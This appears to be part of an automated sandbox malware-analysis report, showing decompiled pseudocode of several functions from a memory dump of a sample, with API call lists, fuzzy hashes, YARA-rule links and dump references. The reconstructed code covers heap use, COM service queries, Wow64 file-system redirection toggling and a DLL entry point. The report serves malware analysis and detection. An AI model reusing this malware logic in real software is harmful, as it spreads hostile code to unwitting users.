						E012076A8(0x110, _a4, _a4, _t27, 0);
					}
					if(E0120773D( &_v36) != 0) {
						_t35 = E01203276(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E01202879(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E012013CC(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E012013CC(_a4);
				}
				return _v16;
			}
















                                                        0x012041da
                                                        0x012041df
                                                        0x012041ec
                                                        0x012041ef
                                                        0x012041f2
                                                        0x012041f9
                                                        0x012041fc
                                                        0x0120420a
                                                        0x0120420f
                                                        0x01204214
                                                        0x01204219
                                                        0x0120421b
                                                        0x01204224
                                                        0x01204224
                                                        0x01204233
                                                        0x01204248
                                                        0x0120424f
                                                        0x01204256
                                                        0x0120425c
                                                        0x01204262
                                                        0x0120426a
                                                        0x01204270
                                                        0x01204273
                                                        0x01204280
                                                        0x01204285
                                                        0x01204289
                                                        0x01204289
                                                        0x0120424f
                                                        0x01204294
                                                        0x0120429f
                                                        0x0120429f
                                                        0x012042ab

                                                        APIs
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • memcpy.NTDLL(00000000,00000110,0120517B,0120517B,?,?,0120517B,?,?,012052EA,?), ref: 0120420A
                                                        • memset.NTDLL ref: 01204280
                                                        • memset.NTDLL ref: 01204294
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: memset$AllocateHeapmemcpy
                                                        • String ID:
                                                        • API String ID: 1529149438-0
                                                        • Opcode ID: a88525bff3d82456582db863ff1c666ce9816318511fc53f7dce80d9041ac4af
                                                        • Instruction ID: 55b13dcfde1d36225a5d7f8d352e99bb223fed44e8d16a952684a0065b21bc66
                                                        • Opcode Fuzzy Hash: a88525bff3d82456582db863ff1c666ce9816318511fc53f7dce80d9041ac4af
                                                        • Instruction Fuzzy Hash: 58214175A10619BFDF12EF99DC40FAEBBB8AF18640F044115FA04E7296D774D6508BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01203686, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 38%
                                                        			E01203686(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x120a2d4; // 0x455d5a8
				_t4 = _t49 + 0x120b448; // 0x57689f0
				_t5 = _t49 + 0x120b438; // 0x9ba05972
				_t51 =  *0x120a140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x120a2d4; // 0x455d5a8
						_t30 = _t56 + 0x120b428; // 0x57689d0
						_t31 = _t56 + 0x120b458; // 0x4c96be40
						_t58 =  *0x120a114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x120a2d4; // 0x455d5a8
											_t23 = _t76 + 0x120b428; // 0x57689d0
											_t24 = _t76 + 0x120b458; // 0x4c96be40
											_t105 =  *0x120a114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x120a2d4; // 0x455d5a8
													_t67 = _v28;
													_t40 = _t99 + 0x120b418; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                                                        0x01203691
                                                        0x01203693
                                                        0x0120369a
                                                        0x0120369b
                                                        0x0120369c
                                                        0x0120369d
                                                        0x012036a3
                                                        0x012036a8
                                                        0x012036b2
                                                        0x012036b9
                                                        0x012036bf
                                                        0x012036c3
                                                        0x012036c9
                                                        0x012036d1
                                                        0x012036d2
                                                        0x012036d7
                                                        0x012036d8
                                                        0x012036da
                                                        0x012036dd
                                                        0x012036de
                                                        0x012036df
                                                        0x012036e5
                                                        0x0120377a
                                                        0x0120377f
                                                        0x01203786
                                                        0x01203790
                                                        0x01203796
                                                        0x01203798
                                                        0x0120379e
                                                        0x00000000
                                                        0x012036eb
                                                        0x012036eb
                                                        0x012036f2
                                                        0x012036fb
                                                        0x012036ff
                                                        0x01203705
                                                        0x01203708
                                                        0x0120376f
                                                        0x00000000
                                                        0x0120370a
                                                        0x0120370a
                                                        0x012037a1
                                                        0x012037a3
                                                        0x00000000
                                                        0x00000000
                                                        0x01203710
                                                        0x01203710
                                                        0x01203710
                                                        0x01203717
                                                        0x0120371d
                                                        0x01203722
                                                        0x0120372a
                                                        0x0120372b
                                                        0x0120372c
                                                        0x0120372e
                                                        0x01203732
                                                        0x01203736
                                                        0x00000000
                                                        0x01203738
                                                        0x0120373c
                                                        0x01203741
                                                        0x01203748
                                                        0x01203758
                                                        0x0120375a
                                                        0x01203760
                                                        0x01203765
                                                        0x012037a5
                                                        0x012037a5
                                                        0x012037b2
                                                        0x012037b6
                                                        0x012037bb
                                                        0x012037c1
                                                        0x012037c6
                                                        0x012037d0
                                                        0x012037d2
                                                        0x012037d8
                                                        0x012037d8
                                                        0x012037db
                                                        0x012037e1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01203765
                                                        0x00000000
                                                        0x01203767
                                                        0x01203767
                                                        0x01203768
                                                        0x00000000
                                                        0x0120376d
                                                        0x0120370a
                                                        0x01203708
                                                        0x012036ff
                                                        0x012037e4
                                                        0x012037e4
                                                        0x012037ea
                                                        0x012037ea
                                                        0x012037f3

                                                        APIs
                                                        • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057689D0,01204DD1,?,?,?,?,?,?,?,?,?,?,?,01204DD1), ref: 01203752
                                                        • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057689D0,01204DD1,?,?,?,?,?,?,?,01204DD1,00000000,00000000,00000000,006D0063), ref: 01203790
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: QueryServiceUnknown_
                                                        • String ID:
                                                        • API String ID: 2042360610-0
                                                        • Opcode ID: 90db439888ba7fed407a08db83bd5da5cc7ddeec60bd962c98cc0685553637a3
                                                        • Instruction ID: 831a1da54fbb19266cc3f1a6daa8d45c1490be0ab62eb13c4374ac7a9e196625
                                                        • Opcode Fuzzy Hash: 90db439888ba7fed407a08db83bd5da5cc7ddeec60bd962c98cc0685553637a3
                                                        • Instruction Fuzzy Hash: 7F5185B5D0021AAFCB15DFE8C888DEEB7B8FF48300B054659E905EB252D731AD45CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01203969, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E01203969(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E01204C9F(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x120a2d4; // 0x455d5a8
						_t20 = _t68 + 0x120b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E01206900(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                        0x0120396f
                                                        0x01203972
                                                        0x01203982
                                                        0x0120398b
                                                        0x0120398f
                                                        0x01203a5d
                                                        0x01203a63
                                                        0x01203a63
                                                        0x012039a9
                                                        0x012039ae
                                                        0x012039b2
                                                        0x012039b8
                                                        0x012039bd
                                                        0x012039c4
                                                        0x012039d3
                                                        0x012039d3
                                                        0x012039d7
                                                        0x012039d9
                                                        0x012039e5
                                                        0x012039f0
                                                        0x012039fb
                                                        0x012039ff
                                                        0x01203a09
                                                        0x01203a0d
                                                        0x01203a0f
                                                        0x01203a14
                                                        0x01203a1b
                                                        0x01203a2b
                                                        0x01203a2b
                                                        0x01203a14
                                                        0x01203a0d
                                                        0x01203a2d
                                                        0x01203a32
                                                        0x01203a37
                                                        0x01203a37
                                                        0x01203a3d
                                                        0x01203a43
                                                        0x01203a48
                                                        0x01203a48
                                                        0x01203a4d
                                                        0x01203a52
                                                        0x01203a52
                                                        0x01203a4d
                                                        0x012039d7
                                                        0x01203a54
                                                        0x01203a5a
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 01204C9F: SysAllocString.OLEAUT32(80000002), ref: 01204CF6
                                                          • Part of subcall function 01204C9F: SysFreeString.OLEAUT32(00000000), ref: 01204D5B
                                                        • SysFreeString.OLEAUT32(?), ref: 01203A48
                                                        • SysFreeString.OLEAUT32(012054F6), ref: 01203A52
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: String$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 986138563-0
                                                        • Opcode ID: 881f447f9b4549c95bd150bb1c0ebc61eef9c559d5a7e18cd3d023865d8f3506
                                                        • Instruction ID: 1b4d5562bdc17fefb5298f9723f6bdd4303d6e3ec263d1fbf928de605e5eaacf
                                                        • Opcode Fuzzy Hash: 881f447f9b4549c95bd150bb1c0ebc61eef9c559d5a7e18cd3d023865d8f3506
                                                        • Instruction Fuzzy Hash: 64317E7291015AEFCB12DF59C888CABBB79FFC97407104658FA159B252D331ED91CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206566, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E01206566(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x120a2d4; // 0x455d5a8
				_t2 = _t42 + 0x120b468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x120a2d4; // 0x455d5a8
					_t6 = _t45 + 0x120b488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x120a2d4; // 0x455d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x120b478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                                        0x01206572
                                                        0x01206573
                                                        0x01206579
                                                        0x01206580
                                                        0x01206582
                                                        0x01206586
                                                        0x0120658a
                                                        0x0120658c
                                                        0x01206595
                                                        0x0120659b
                                                        0x012065a3
                                                        0x012065a5
                                                        0x012065a9
                                                        0x012065ab
                                                        0x012065b8
                                                        0x012065bc
                                                        0x012065c1
                                                        0x012065c7
                                                        0x012065cc
                                                        0x012065d4
                                                        0x012065d6
                                                        0x012065d8
                                                        0x012065de
                                                        0x012065de
                                                        0x012065e1
                                                        0x012065e7
                                                        0x012065e7
                                                        0x012065ea
                                                        0x012065f0
                                                        0x012065f0
                                                        0x012065f7

                                                        APIs
                                                        • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 012065A3
                                                        • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 012065D4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Interface_ProxyQueryUnknown_
                                                        • String ID:
                                                        • API String ID: 2522245112-0
                                                        • Opcode ID: 3143fde34afc1535c95a4619d96d69c537f5125ad545aed38fc2006fbde87c2a
                                                        • Instruction ID: e328c09b08abd7def763aef654cf5ff42d729a32ae4268a632dd372d0ccaf93b
                                                        • Opcode Fuzzy Hash: 3143fde34afc1535c95a4619d96d69c537f5125ad545aed38fc2006fbde87c2a
                                                        • Instruction Fuzzy Hash: 13218175A0061AEFCB11DFA4C898D9AB779FF88704B108794E905DB316D731EE01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120299C, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 012029C4
                                                          • Part of subcall function 01203969: SysFreeString.OLEAUT32(?), ref: 01203A48
                                                        • SafeArrayDestroy.OLEAUT32(?), ref: 01202A11
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ArraySafe$CreateDestroyFreeString
                                                        • String ID:
                                                        • API String ID: 3098518882-0
                                                        • Opcode ID: 4420945515df4b7b1e07b4384a944071307067e79064ef69b515b3e883e3f973
                                                        • Instruction ID: 5eec0d3372f4e360548627031f29f9ab71b0b245062a6984fc139ce204014ccc
                                                        • Opcode Fuzzy Hash: 4420945515df4b7b1e07b4384a944071307067e79064ef69b515b3e883e3f973
                                                        • Instruction Fuzzy Hash: E611823291010ABFDF12DF98D848AEEBBB9EB04310F008122FA04E7162D7719A55CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120609A, Relevance: 3.0, APIs: 2, Instructions: 47memorytimeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0120609A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E01203FC1(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E01205A1E(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E01201E65(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x120a290, 0, _t23);
				}
				return _t20;
			}










                                                        0x0120609a
                                                        0x012060ab
                                                        0x012060af
                                                        0x01206108
                                                        0x012060b1
                                                        0x012060b8
                                                        0x012060be
                                                        0x012060c2
                                                        0x012060c7
                                                        0x012060cb
                                                        0x012060d1
                                                        0x012060e1
                                                        0x012060f3
                                                        0x012060f3
                                                        0x012060fe
                                                        0x012060fe
                                                        0x0120610f

                                                        APIs
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                        • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,0576930C), ref: 012060D1
                                                        • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,0576930C), ref: 012060FE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                        • String ID:
                                                        • API String ID: 1500278894-0
                                                        • Opcode ID: d4df36a20eb17533e784da782138193d80ba71924d113367cdc1a884ec6016cf
                                                        • Instruction ID: dafea100f155d4e9fb159db165dc0618fe57e8a1b76574548bdd653cb721de36
                                                        • Opcode Fuzzy Hash: d4df36a20eb17533e784da782138193d80ba71924d113367cdc1a884ec6016cf
                                                        • Instruction Fuzzy Hash: 65018F3222020ABBDF239F58DC48E9A7F79FB84704F004124FA04A6197EBB1D964C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205F4F, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SysAllocString.OLEAUT32(01203E52), ref: 01205F69
                                                          • Part of subcall function 01203969: SysFreeString.OLEAUT32(?), ref: 01203A48
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01205FA9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: String$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 986138563-0
                                                        • Opcode ID: de0592c50797980d7cd32ae0a5761e45708192e6f5334e8f979ee80e3004d4eb
                                                        • Instruction ID: 42d8da1b4a1f1c22a2e65dd48155a33cc62f72225b3ffe3ab8693a30e39b42a8
                                                        • Opcode Fuzzy Hash: de0592c50797980d7cd32ae0a5761e45708192e6f5334e8f979ee80e3004d4eb
                                                        • Instruction Fuzzy Hash: 8E018F3651150ABFDF229FA8D808C9FBBB9EF48200B000121EA05A6122D7709A15CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01203625, Relevance: 3.0, APIs: 2, Instructions: 34stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01203625(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t17;
				WCHAR* _t19;
				void* _t20;

				_t19 = E01205FBC(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t19 == 0) {
					_t20 = 8;
				} else {
					_t11 =  *0x120a2d4; // 0x455d5a8
					_t5 = _t11 + 0x120b9f8; // 0x43002f
					wsprintfW(_t19, _t5, 5, _a4);
					_t14 =  *0x120a2d4; // 0x455d5a8
					_t6 = _t14 + 0x120b918; // 0x6d0063
					_t17 = E0120663C(0, _t19, _t6, 0); // executed
					_t20 = _t17;
					E012013CC(_t19);
				}
				return _t20;
			}









                                                        0x0120363b
                                                        0x0120363f
                                                        0x0120367e
                                                        0x01203641
                                                        0x01203645
                                                        0x0120364c
                                                        0x01203654
                                                        0x0120365a
                                                        0x01203662
                                                        0x0120366d
                                                        0x01203673
                                                        0x01203675
                                                        0x01203675
                                                        0x01203683

                                                        APIs
                                                        • lstrlenW.KERNEL32(74B5F710,00000000,?,01207599,?,?,74B5F710,00000000,74B5F730,?,?,?,?,0120519C,?,00000001), ref: 0120362B
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • wsprintfW.USER32 ref: 01203654
                                                          • Part of subcall function 0120663C: memset.NTDLL ref: 01206660
                                                          • Part of subcall function 0120663C: Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0120669C
                                                          • Part of subcall function 0120663C: GetLastError.KERNEL32 ref: 012066AC
                                                          • Part of subcall function 0120663C: Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 012066BD
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Wow64$EnableHeapRedirection$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                                        • String ID:
                                                        • API String ID: 1174530276-0
                                                        • Opcode ID: 278b130e0895c8724f4ab91b323e074ea698a2f9e8d82e117ac4566176782ce1
                                                        • Instruction ID: 58f14a147643679dd8e1750c7ecdc51755560e443fd9f908331395344f16a199
                                                        • Opcode Fuzzy Hash: 278b130e0895c8724f4ab91b323e074ea698a2f9e8d82e117ac4566176782ce1
                                                        • Instruction Fuzzy Hash: FDF0E232210216AFD723EB68EC4CE6BBBACEB90720F414626F604C7297DB34C4408B55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120694D, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x120a294) == 0) {
						E0120566B();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x120a294) == 1) {
						_t10 = E0120682B(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                                        0x01206954
                                                        0x01206955
                                                        0x01206958
                                                        0x0120698a
                                                        0x0120698c
                                                        0x0120698c
                                                        0x0120695a
                                                        0x0120695b
                                                        0x01206970
                                                        0x01206977
                                                        0x01206979
                                                        0x01206979
                                                        0x01206977
                                                        0x0120695b
                                                        0x01206994

                                                        APIs
                                                        • InterlockedIncrement.KERNEL32(0120A294), ref: 01206962
                                                          • Part of subcall function 0120682B: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 01206840
                                                        • InterlockedDecrement.KERNEL32(0120A294), ref: 01206982
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Interlocked$CreateDecrementHeapIncrement
                                                        • String ID:
                                                        • API String ID: 3834848776-0
                                                        • Opcode ID: c55a4110cda8e521be48b8651574f433b0914c1cd3fff71dcb8dc7841252fbee
